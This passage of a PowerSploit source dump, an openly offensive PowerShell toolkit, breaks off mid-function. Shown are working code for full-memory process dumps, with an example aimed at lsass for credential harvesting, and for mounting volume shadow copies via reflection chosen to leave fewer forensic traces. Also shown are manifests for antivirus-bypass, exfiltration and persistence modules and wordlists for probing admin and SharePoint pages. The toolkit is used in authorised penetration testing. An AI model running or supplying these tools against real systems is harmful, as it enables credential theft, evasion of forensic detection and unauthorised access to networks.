 17 |     This is similar to running procdump.exe with the '-ma' switch.
 18 | 
 19 | .PARAMETER Process
 20 | 
 21 |     Specifies the process for which a dump will be generated. The process object
 22 |     is obtained with Get-Process.
 23 | 
 24 | .PARAMETER DumpFilePath
 25 | 
 26 |     Specifies the path where dump files will be written. By default, dump files
 27 |     are written to the current working directory. Dump file names take following
 28 |     form: processname_id.dmp
 29 | 
 30 | .EXAMPLE
 31 | 
 32 |     Out-Minidump -Process (Get-Process -Id 4293)
 33 | 
 34 |     Description
 35 |     -----------
 36 |     Generate a minidump for process ID 4293.
 37 | 
 38 | .EXAMPLE
 39 | 
 40 |     Get-Process lsass | Out-Minidump
 41 | 
 42 |     Description
 43 |     -----------
 44 |     Generate a minidump for the lsass process. Note: To dump lsass, you must be
 45 |     running from an elevated prompt.
 46 | 
 47 | .EXAMPLE
 48 | 
 49 |     Get-Process | Out-Minidump -DumpFilePath C:\temp
 50 | 
 51 |     Description
 52 |     -----------
 53 |     Generate a minidump of all running processes and save them to C:\temp.
 54 | 
 55 | .INPUTS
 56 | 
 57 |     System.Diagnostics.Process
 58 | 
 59 |     You can pipe a process object to Out-Minidump.
 60 | 
 61 | .OUTPUTS
 62 | 
 63 |     System.IO.FileInfo
 64 | 
 65 | .LINK
 66 | 
 67 |     http://www.exploit-monday.com/
 68 | #>
 69 | 
 70 |     [CmdletBinding()]
 71 |     Param (
 72 |         [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)]
 73 |         [System.Diagnostics.Process]
 74 |         $Process,
 75 | 
 76 |         [Parameter(Position = 1)]
 77 |         [ValidateScript({ Test-Path $_ })]
 78 |         [String]
 79 |         $DumpFilePath = $PWD
 80 |     )
 81 | 
 82 |     BEGIN
 83 |     {
 84 |         $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
 85 |         $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
 86 |         $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
 87 |         $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
 88 |         $MiniDumpWithFullMemory = [UInt32] 2
 89 |     }
 90 | 
 91 |     PROCESS
 92 |     {
 93 |         $ProcessId = $Process.Id
 94 |         $ProcessName = $Process.Name
 95 |         $ProcessHandle = $Process.Handle
 96 |         $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp"
 97 | 
 98 |         $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
 99 | 
100 |         $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
101 | 
102 |         $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
103 |                                                      $ProcessId,
104 |                                                      $FileStream.SafeFileHandle,
105 |                                                      $MiniDumpWithFullMemory,
106 |                                                      [IntPtr]::Zero,
107 |                                                      [IntPtr]::Zero,
108 |                                                      [IntPtr]::Zero))
109 | 
110 |         $FileStream.Close()
111 | 
112 |         if (-not $Result)
113 |         {
114 |             $Exception = New-Object ComponentModel.Win32Exception
115 |             $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
116 | 
117 |             # Remove any partially written dump files. For example, a partial dump will be written
118 |             # in the case when 32-bit PowerShell tries to dump a 64-bit process.
119 |             Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
120 | 
121 |             throw $ExceptionMessage
122 |         }
123 |         else
124 |         {
125 |             Get-ChildItem $ProcessDumpPath
126 |         }
127 |     }
128 | 
129 |     END {}
130 | }
131 | 


--------------------------------------------------------------------------------
/Exfiltration/Usage.md:
--------------------------------------------------------------------------------
 1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 2 | 
 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 5 | 
 6 | To use the module, type `Import-Module Exfiltration`
 7 | 
 8 | To see the commands imported, type `Get-Command -Module Exfiltration`
 9 | 
10 | For help on each individual command, Get-Help is your friend.
11 | 
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.


--------------------------------------------------------------------------------
/Exfiltration/VolumeShadowCopyTools.ps1:
--------------------------------------------------------------------------------
  1 | function Get-VolumeShadowCopy
  2 | {
  3 | <#
  4 | .SYNOPSIS
  5 | 
  6 |     Lists the device paths of all local volume shadow copies.
  7 | 
  8 |     PowerSploit Function: Get-VolumeShadowCopy
  9 |     Author: Matthew Graeber (@mattifestation)
 10 |     License: BSD 3-Clause
 11 |     Required Dependencies: None
 12 |     Optional Dependencies: None
 13 |     Version: 2.0.0
 14 | #>
 15 | 
 16 |     $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())
 17 | 
 18 |     if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
 19 |     {
 20 |         Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'
 21 |     }
 22 | 
 23 |     Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.DeviceObject }
 24 | }
 25 | 
 26 | function Mount-VolumeShadowCopy
 27 | {
 28 | <#
 29 | .SYNOPSIS
 30 | 
 31 |     Mounts a volume shadow copy.
 32 | 
 33 |     PowerSploit Function: Mount-VolumeShadowCopy
 34 |     Author: Matthew Graeber (@mattifestation)
 35 |     License: BSD 3-Clause
 36 |     Required Dependencies: None
 37 |     Optional Dependencies: None
 38 |     Version: 2.0.0
 39 | 
 40 | .DESCRIPTION
 41 | 
 42 |     Mount-VolumeShadowCopy mounts a volume shadow copy volume by creating a symbolic link.
 43 | 
 44 | .PARAMETER Path
 45 | 
 46 |     Specifies the path to which the symbolic link for the mounted volume shadow copy will be saved.
 47 | 
 48 | .PARAMETER DevicePath
 49 | 
 50 |     Specifies the volume shadow copy 'DeviceObject' path. This path can be retrieved with the Get-VolumeShadowCopy PowerSploit function or with the Win32_ShadowCopy object.
 51 | 
 52 | .EXAMPLE
 53 | 
 54 |     Get-VolumeShadowCopy | Mount-VolumeShadowCopy -Path C:\VSS
 55 | 
 56 |     Description
 57 |     -----------
 58 |     Create a mount point in 'C:\VSS' for each volume shadow copy volume
 59 | 
 60 | .EXAMPLE
 61 | 
 62 |     Mount-VolumeShadowCopy -Path C:\VSS -DevicePath '\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4'
 63 | 
 64 | .EXAMPLE
 65 | 
 66 |     Get-WmiObject Win32_ShadowCopy | % { $_.DeviceObject -Path C:\VSS -DevicePath $_ }
 67 | #>
 68 | 
 69 |     Param (
 70 |         [Parameter(Mandatory = $True)]
 71 |         [ValidateNotNullOrEmpty()]
 72 |         [String]
 73 |         $Path,
 74 | 
 75 |         [Parameter(Mandatory = $True, ValueFromPipeline = $True)]
 76 |         [ValidatePattern('^\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy[0-9]{1,3}$')]
 77 |         [String[]]
 78 |         $DevicePath
 79 |     )
 80 | 
 81 |     BEGIN
 82 |     {
 83 |         $UserIdentity = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent())
 84 | 
 85 |         if (-not $UserIdentity.IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator'))
 86 |         {
 87 |             Throw 'You must run Get-VolumeShadowCopy from an elevated command prompt.'
 88 |         }
 89 | 
 90 |         # Validate that the path exists before proceeding
 91 |         Get-ChildItem $Path -ErrorAction Stop | Out-Null
 92 | 
 93 |         $DynAssembly = New-Object System.Reflection.AssemblyName('VSSUtil')
 94 |         $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
 95 |         $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('VSSUtil', $False)
 96 | 
 97 |         # Define [VSS.Kernel32]::CreateSymbolicLink method using reflection
 98 |         # (i.e. none of the forensic artifacts left with using Add-Type)
 99 |         $TypeBuilder = $ModuleBuilder.DefineType('VSS.Kernel32', 'Public, Class')
100 |         $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('CreateSymbolicLink',
101 |                                                             'kernel32.dll',
102 |                                                             ([Reflection.MethodAttributes]::Public -bor [Reflection.MethodAttributes]::Static),
103 |                                                             [Reflection.CallingConventions]::Standard,
104 |                                                             [Bool],
105 |                                                             [Type[]]@([String], [String], [UInt32]),
106 |                                                             [Runtime.InteropServices.CallingConvention]::Winapi,
107 |                                                             [Runtime.InteropServices.CharSet]::Auto)
108 |         $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
109 |         $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
110 |         $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($DllImportConstructor,
111 |                                                                                          @('kernel32.dll'),
112 |                                                                                          [Reflection.FieldInfo[]]@($SetLastError),
113 |                                                                                          @($true))
114 |         $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
115 | 
116 |         $Kernel32Type = $TypeBuilder.CreateType()
117 |     }
118 | 
119 |     PROCESS
120 |     {
121 |         foreach ($Volume in $DevicePath)
122 |         {
123 |             $Volume -match '^\\\\\?\\GLOBALROOT\\Device\\(?<LinkName>HarddiskVolumeShadowCopy[0-9]{1,3})$' | Out-Null
124 |             
125 |             $LinkPath = Join-Path $Path $Matches.LinkName
126 | 
127 |             if (Test-Path $LinkPath)
128 |             {
129 |                 Write-Warning "'$LinkPath' already exists."
130 |                 continue
131 |             }
132 | 
133 |             if (-not $Kernel32Type::CreateSymbolicLink($LinkPath, "$($Volume)\", 1))
134 |             {
135 |                 Write-Error "Symbolic link creation failed for '$Volume'."
136 |                 continue
137 |             }
138 | 
139 |             Get-Item $LinkPath
140 |         }
141 |     }
142 | 
143 |     END
144 |     {
145 | 
146 |     }
147 | }


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | PowerSploit is provided under the 3-clause BSD license below.
 2 | 
 3 | *************************************************************
 4 | 
 5 | Copyright (c) 2012, Matthew Graeber
 6 | All rights reserved.
 7 | 
 8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
 9 | 
10 |     Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 |     Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 |     The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 | 
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 | 
16 | 
17 | 


--------------------------------------------------------------------------------
/Mayhem/Mayhem.psd1:
--------------------------------------------------------------------------------
 1 | @{
 2 | 
 3 | # Script module or binary module file associated with this manifest.
 4 | ModuleToProcess = 'Mayhem.psm1'
 5 | 
 6 | # Version number of this module.
 7 | ModuleVersion = '1.0.0.0'
 8 | 
 9 | # ID used to uniquely identify this module
10 | GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
11 | 
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 | 
15 | # Company or vendor of this module
16 | CompanyName = ''
17 | 
18 | # Copyright statement for this module
19 | Copyright = 'BSD 3-Clause'
20 | 
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Mayhem Module'
23 | 
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 | 
27 | # Name of the Windows PowerShell host required by this module
28 | # PowerShellHostName = ''
29 | 
30 | # Minimum version of the Windows PowerShell host required by this module
31 | # PowerShellHostVersion = ''
32 | 
33 | # Minimum version of the .NET Framework required by this module
34 | # DotNetFrameworkVersion = ''
35 | 
36 | # Minimum version of the common language runtime (CLR) required by this module
37 | # CLRVersion = ''
38 | 
39 | # Processor architecture (None, X86, Amd64) required by this module
40 | # ProcessorArchitecture = ''
41 | 
42 | # Modules that must be imported into the global environment prior to importing this module
43 | # RequiredModules = @()
44 | 
45 | # Assemblies that must be loaded prior to importing this module
46 | # RequiredAssemblies = @()
47 | 
48 | # Script files (.ps1) that are run in the caller's environment prior to importing this module.
49 | # ScriptsToProcess = ''
50 | 
51 | # Type files (.ps1xml) to be loaded when importing this module
52 | # TypesToProcess = @()
53 | 
54 | # Format files (.ps1xml) to be loaded when importing this module
55 | # FormatsToProcess = @()
56 | 
57 | # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
58 | # NestedModules = @()
59 | 
60 | # Functions to export from this module
61 | FunctionsToExport = '*'
62 | 
63 | # Cmdlets to export from this module
64 | CmdletsToExport = '*'
65 | 
66 | # Variables to export from this module
67 | VariablesToExport = ''
68 | 
69 | # Aliases to export from this module
70 | AliasesToExport = ''
71 | 
72 | # List of all modules packaged with this module.
73 | ModuleList = @(@{ModuleName = 'Mayhem'; ModuleVersion = '1.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'})
74 | 
75 | # List of all files packaged with this module
76 | FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
77 | 
78 | # Private data to pass to the module specified in RootModule/ModuleToProcess
79 | # PrivateData = ''
80 | 
81 | # HelpInfo URI of this module
82 | # HelpInfoURI = ''
83 | 
84 | # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
85 | # DefaultCommandPrefix = ''
86 | 
87 | }
88 | 


--------------------------------------------------------------------------------
/Mayhem/Usage.md:
--------------------------------------------------------------------------------
 1 | To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 2 | 
 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 5 | 
 6 | To use the module, type `Import-Module Mayhem`
 7 | 
 8 | To see the commands imported, type `Get-Command -Module Mayhem`
 9 | 
10 | For help on each individual command, Get-Help is your friend.
11 | 
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.


--------------------------------------------------------------------------------
/Persistence/Persistence.psd1:
--------------------------------------------------------------------------------
 1 | @{
 2 | 
 3 | # Script module or binary module file associated with this manifest.
 4 | ModuleToProcess = 'Persistence.psm1'
 5 | 
 6 | # Version number of this module.
 7 | ModuleVersion = '1.1.1.0'
 8 | 
 9 | # ID used to uniquely identify this module
10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195'
11 | 
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 | 
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 | 
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Persistence Module'
20 | 
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 | 
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 | 
27 | # Cmdlets to export from this module
28 | CmdletsToExport = '*'
29 | 
30 | # List of all files packaged with this module
31 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md'
32 | 
33 | }
34 | 


--------------------------------------------------------------------------------
/Persistence/Usage.md:
--------------------------------------------------------------------------------
 1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 2 | 
 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 5 | 
 6 | To use the module, type `Import-Module Persistence`
 7 | 
 8 | To see the commands imported, type `Get-Command -Module Persistence`
 9 | 
10 | For help on each individual command, Get-Help is your friend.


--------------------------------------------------------------------------------
/PowerSploit.psd1:
--------------------------------------------------------------------------------
 1 | @{
 2 | # Script module or binary module file associated with this manifest.
 3 | ModuleToProcess = 'PowerSploit.psm1'
 4 | 
 5 | # Version number of this module.
 6 | ModuleVersion = '1.0.0.0'
 7 | 
 8 | # ID used to uniquely identify this module
 9 | GUID = '6753b496-d842-40a3-924a-0f09e248640c'
10 | 
11 | # Author of this module
12 | Author = 'Matthew Graeber'
13 | 
14 | # Company or vendor of this module
15 | CompanyName = ''
16 | 
17 | # Copyright statement for this module
18 | Copyright = 'BSD 3-Clause'
19 | 
20 | # Description of the functionality provided by this module
21 | Description = 'PowerSploit Root Module'
22 | 
23 | # Minimum version of the Windows PowerShell engine required by this module
24 | PowerShellVersion = '2.0'
25 | 
26 | # Functions to export from this module
27 | FunctionsToExport = '*'
28 | 
29 | # Cmdlets to export from this module
30 | CmdletsToExport = '*'
31 | 
32 | # Variables to export from this module
33 | VariablesToExport = ''
34 | 
35 | # Aliases to export from this module
36 | AliasesToExport = ''
37 | 
38 | # List of all modules packaged with this module.
39 | ModuleList = @( @{ModuleName = 'AntivirusBypass'; ModuleVersion = '1.0.0.0'; GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'},
40 |                 @{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'},
41 |                 @{ModuleName = 'Exfiltration'; ModuleVersion = '1.0.0.0'; GUID = '75dafa99-1402-4e29-b5d4-6c87da2b323a'},
42 |                 @{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'},
43 |                 @{ModuleName = 'ScriptModification'; ModuleVersion = '1.0.0.0'; GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'},
44 |                 @{ModuleName = 'Persistence'; ModuleVersion = '1.0.0.0'; GUID = '633d0f10-a056-41da-869d-6d2f75430195'} )
45 | }
46 | 


--------------------------------------------------------------------------------
/PowerSploit.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer } | % { Import-Module $_.FullName -DisableNameChecking }
2 | 


--------------------------------------------------------------------------------
/Recon/Dictionaries/admin.txt:
--------------------------------------------------------------------------------
  1 | admin1.php
  2 | admin.asp
  3 | admin/account.asp
  4 | admin/account.html
  5 | admin/account.php
  6 | admin/controlpanel.asp
  7 | admin/controlpanel.html
  8 | admin/controlpanel.php
  9 | admin/cp.asp
 10 | admin/cp.html
 11 | admin/cp.php
 12 | admin/home.asp
 13 | admin/home.php
 14 | admin/index.asp
 15 | admin/index.html
 16 | admin/login.asp
 17 | admin/login.html
 18 | admin/login.php
 19 | admin1.asp
 20 | admin1.html
 21 | admin1/
 22 | admin2.asp
 23 | admin2.html
 24 | admin2.php
 25 | admin4_account/
 26 | admin4_colon/
 27 | admincontrol.asp
 28 | admincontrol.html
 29 | admincontrol.php
 30 | administer/
 31 | administr8.asp
 32 | administr8.html
 33 | administr8.php
 34 | administr8/
 35 | administracao.php
 36 | administracao/
 37 | administracion.php
 38 | administracion/
 39 | administrateur.php
 40 | administrateur/
 41 | administratie/
 42 | administration.html
 43 | administration.php
 44 | administration/
 45 | administrator.asp
 46 | administrator.html
 47 | administrator.php
 48 | administrator/account.asp
 49 | administrator/account.html
 50 | administrator/account.php
 51 | administrator/index.asp
 52 | administrator/index.html
 53 | administrator/index.php
 54 | administrator/login.asp
 55 | administrator/login.html
 56 | administrator/login.php
 57 | administratoraccounts/
 58 | administrators/
 59 | administrivia/
 60 | adminpanel.asp
 61 | adminpanel.html
 62 | adminpanel.php
 63 | adminpro/
 64 | admins.asp
 65 | admins.html
 66 | admins.php
 67 | admins/
 68 | AdminTools/
 69 | amministratore.php
 70 | amministratore/
 71 | autologin/
 72 | banneradmin/
 73 | bbadmin/
 74 | beheerder.php
 75 | beheerder/
 76 | bigadmin/
 77 | blogindex/
 78 | cadmins/
 79 | ccms/
 80 | ccms/index.php
 81 | ccms/login.php
 82 | ccp14admin/
 83 | cmsadmin/
 84 | configuration/
 85 | configure/
 86 | controlpanel.asp
 87 | controlpanel.html
 88 | controlpanel.php
 89 | controlpanel/
 90 | cp.asp
 91 | cp.html
 92 | cp.php
 93 | cpanel_file/
 94 | customer_login/
 95 | database_administration/
 96 | Database_Administration/
 97 | dir-login/
 98 | directadmin/
 99 | ezsqliteadmin/
100 | fileadmin.asp
101 | fileadmin.html
102 | fileadmin.php
103 | formslogin/
104 | globes_admin/
105 | hpwebjetadmin/
106 | Indy_admin/
107 | irc-macadmin/
108 | LiveUser_Admin/
109 | login_db/
110 | login-redirect/
111 | login-us/
112 | login.asp
113 | login.html
114 | login.php
115 | login1/
116 | loginflat/
117 | logo_sysadmin/
118 | Lotus_Domino_Admin/
119 | macadmin/
120 | maintenance/
121 | manuallogin/
122 | memlogin/
123 | meta_login/
124 | modelsearch/login.asp
125 | modelsearch/login.php
126 | moderator.asp
127 | moderator.html
128 | moderator.php
129 | moderator/
130 | moderator/admin.asp
131 | moderator/admin.html
132 | moderator/admin.php
133 | moderator/login.asp
134 | moderator/login.html
135 | moderator/login.php
136 | myadmin/
137 | navSiteAdmin/
138 | newsadmin/
139 | openvpnadmin/
140 | painel/
141 | panel/
142 | pgadmin/
143 | phpldapadmin/
144 | phppgadmin/
145 | phpSQLiteAdmin/
146 | platz_login/
147 | power_user/
148 | project-admins/
149 | pureadmin/
150 | radmind-1/
151 | radmind/
152 | rcLogin/
153 | server_admin_small/
154 | Server.asp
155 | Server.html
156 | Server.php
157 | ServerAdministrator/
158 | showlogin/
159 | simpleLogin/
160 | smblogin/
161 | sql-admin/
162 | ss_vms_admin_sm/
163 | sshadmin/
164 | staradmin/
165 | sub-login/
166 | Super-Admin/
167 | support_login/
168 | sys-admin/
169 | sysadmin.asp
170 | sysadmin.html
171 | sysadmin.php
172 | sysadmin/
173 | SysAdmin/
174 | SysAdmin2/
175 | sysadmins/
176 | system_administration/
177 | system-administration/
178 | ur-admin.asp
179 | ur-admin.html
180 | ur-admin.php
181 | ur-admin/
182 | useradmin/
183 | UserLogin/
184 | utility_login/
185 | v2/painel/
186 | vadmind/
187 | vmailadmin/
188 | webadmin.asp
189 | webadmin.html
190 | webadmin.php
191 | webmaster/
192 | websvn/
193 | wizmysqladmin/
194 | wp-admin/
195 | wp-login/
196 | xlogin/
197 | yonetici.asp
198 | yonetici.html
199 | yonetici.php
200 | yonetim.asp
201 | yonetim.html
202 | yonetim.php


--------------------------------------------------------------------------------
/Recon/Dictionaries/generic.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cheetz/PowerSploit/f87de659385725813f6eb1236790ff22809b11fa/Recon/Dictionaries/generic.txt


--------------------------------------------------------------------------------
/Recon/Dictionaries/sharepoint.txt:
--------------------------------------------------------------------------------
  1 | _catalogs/masterpage/Forms/AllItems.aspx
  2 | _catalogs/wp/Forms/AllItems.aspx
  3 | _catalogs/wt/Forms/Common.aspx
  4 | _layouts/1033/IMAGES
  5 | _layouts/aclinv.aspx
  6 | _layouts/addrole.aspx
  7 | _layouts/AdminRecycleBin.aspx
  8 | _layouts/AreaNavigationSettings.aspx
  9 | _Layouts/AreaTemplateSettings.aspx
 10 | _Layouts/AreaWelcomePage.aspx
 11 | _layouts/associatedgroups.aspx
 12 | _layouts/bpcf.aspx
 13 | _Layouts/ChangeSiteMasterPage.aspx
 14 | _layouts/create.aspx
 15 | _layouts/editgrp.aspx
 16 | _layouts/editprms.aspx
 17 | _layouts/groups.aspx
 18 | _layouts/help.aspx
 19 | _layouts/images/
 20 | _layouts/listedit.aspx
 21 | _layouts/ManageFeatures.aspx
 22 | _layouts/ManageFeatures.aspx?Scope=Site
 23 | _layouts/mcontent.aspx
 24 | _layouts/mngctype.aspx
 25 | _layouts/mngfield.aspx
 26 | _layouts/mngsiteadmin.aspx
 27 | _layouts/mngsubwebs.aspx
 28 | _layouts/mngsubwebs.aspx?view=sites
 29 | _layouts/mobile/mbllists.aspx
 30 | _layouts/MyInfo.aspx
 31 | _layouts/MyPage.aspx
 32 | _layouts/MyTasks.aspx
 33 | _layouts/navoptions.aspx
 34 | _layouts/NewDwp.aspx
 35 | _layouts/newgrp.aspx
 36 | _layouts/newsbweb.aspx
 37 | _layouts/PageSettings.aspx
 38 | _layouts/people.aspx
 39 | _layouts/people.aspx?MembershipGroupId=0
 40 | _layouts/permsetup.aspx
 41 | _layouts/picker.aspx
 42 | _layouts/policy.aspx
 43 | _layouts/policyconfig.aspx
 44 | _layouts/policycts.aspx
 45 | _layouts/Policylist.aspx
 46 | _layouts/prjsetng.aspx
 47 | _layouts/quiklnch.aspx
 48 | _layouts/recyclebin.aspx
 49 | _Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
 50 | _layouts/role.aspx
 51 | _layouts/settings.aspx
 52 | _layouts/SiteDirectorySettings.aspx
 53 | _layouts/sitemanager.aspx
 54 | _Layouts/SiteManager.aspx?lro=all
 55 | _layouts/spcf.aspx
 56 | _layouts/storman.aspx
 57 | _layouts/themeweb.aspx
 58 | _layouts/topnav.aspx
 59 | _layouts/user.aspx
 60 | _layouts/userdisp.aspx
 61 | _layouts/userdisp.aspx?ID=1
 62 | _layouts/useredit.aspx
 63 | _layouts/useredit.aspx?ID=1&Source=%2F%5Flayouts%2Fpeople%2Easpx
 64 | _layouts/viewgrouppermissions.aspx
 65 | _layouts/viewlsts.aspx
 66 | _layouts/vsubwebs.aspx
 67 | _layouts/WPPrevw.aspx?ID=247
 68 | _layouts/wrkmng.aspx
 69 | _vti_bin/Admin.asmx
 70 | _vti_bin/alerts.asmx
 71 | _vti_bin/dspsts.asmx
 72 | _vti_bin/forms.asmx
 73 | _vti_bin/Lists.asmx
 74 | _vti_bin/people.asmx
 75 | _vti_bin/Permissions.asmx
 76 | _vti_bin/search.asmx
 77 | _vti_bin/UserGroup.asmx
 78 | _vti_bin/versions.asmx
 79 | _vti_bin/Views.asmx
 80 | _vti_bin/webpartpages.asmx
 81 | _vti_bin/webs.asmx
 82 | _vti_bin/spsdisco.aspx
 83 | _vti_bin/AreaService.asmx
 84 | _vti_bin/BusinessDataCatalog.asmx
 85 | _vti_bin/ExcelService.asmx
 86 | _vti_bin/SharepointEmailWS.asmx
 87 | _vti_bin/spscrawl.asmx
 88 | _vti_bin/spsearch.asmx
 89 | _vti_bin/UserProfileService.asmx
 90 | _vti_bin/WebPartPages.asmx
 91 | default.aspx
 92 | Forms/DispForm.aspx
 93 | Forms/DispForm.aspx?ID=1
 94 | Forms/EditForm.aspx
 95 | Forms/EditForm.aspx?ID=1
 96 | Forms/Forms/AllItems.aspx
 97 | Forms/MyItems.aspx
 98 | Forms/NewForm.aspx
 99 | Pages/default.aspx
100 | Pages/Forms/AllItems.aspx
101 | shared documents/forms/allitems.aspx


--------------------------------------------------------------------------------
/Recon/Get-HttpStatus.ps1:
--------------------------------------------------------------------------------
  1 | function Get-HttpStatus
  2 | {
  3 | <#
  4 | .SYNOPSIS
  5 | 
  6 | Returns the HTTP Status Codes and full URL for specified paths.
  7 | 
  8 | PowerSploit Function: Get-HttpStatus
  9 | Author: Chris Campbell (@obscuresec)
 10 | License: BSD 3-Clause
 11 | Required Dependencies: None
 12 | Optional Dependencies: None
 13 | 
 14 | .DESCRIPTION
 15 | 
 16 | A script to check for the existence of a path or file on a webserver.
 17 | 
 18 | .PARAMETER Target
 19 | 
 20 | Specifies the remote web host either by IP or hostname.
 21 | 
 22 | .PARAMETER Path
 23 | 
 24 | Specifies the remost host.
 25 | 
 26 | .PARAMETER Port
 27 | 
 28 | Specifies the port to connect to.
 29 | 
 30 | .PARAMETER UseSSL
 31 | 
 32 | Use an SSL connection.
 33 | 
 34 | .EXAMPLE
 35 | 
 36 | C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
 37 | 
 38 | .EXAMPLE
 39 | 
 40 | C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
 41 | 
 42 | .NOTES
 43 | 
 44 | HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
 45 |     
 46 | .LINK
 47 | 
 48 | http://obscuresecurity.blogspot.com
 49 | http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
 50 | #>
 51 | 
 52 |     [CmdletBinding()] Param(
 53 |         [Parameter(Mandatory = $True)]
 54 |         [String]
 55 |         $Target,
 56 | 
 57 |         [String]
 58 |         [ValidateNotNullOrEmpty()]
 59 |         $Path = '.\Dictionaries\admin.txt',
 60 | 
 61 |         [Int]
 62 |         $Port,
 63 | 
 64 |         [Switch]
 65 |         $UseSSL
 66 |     )
 67 |     
 68 |     if (Test-Path $Path) {
 69 |     
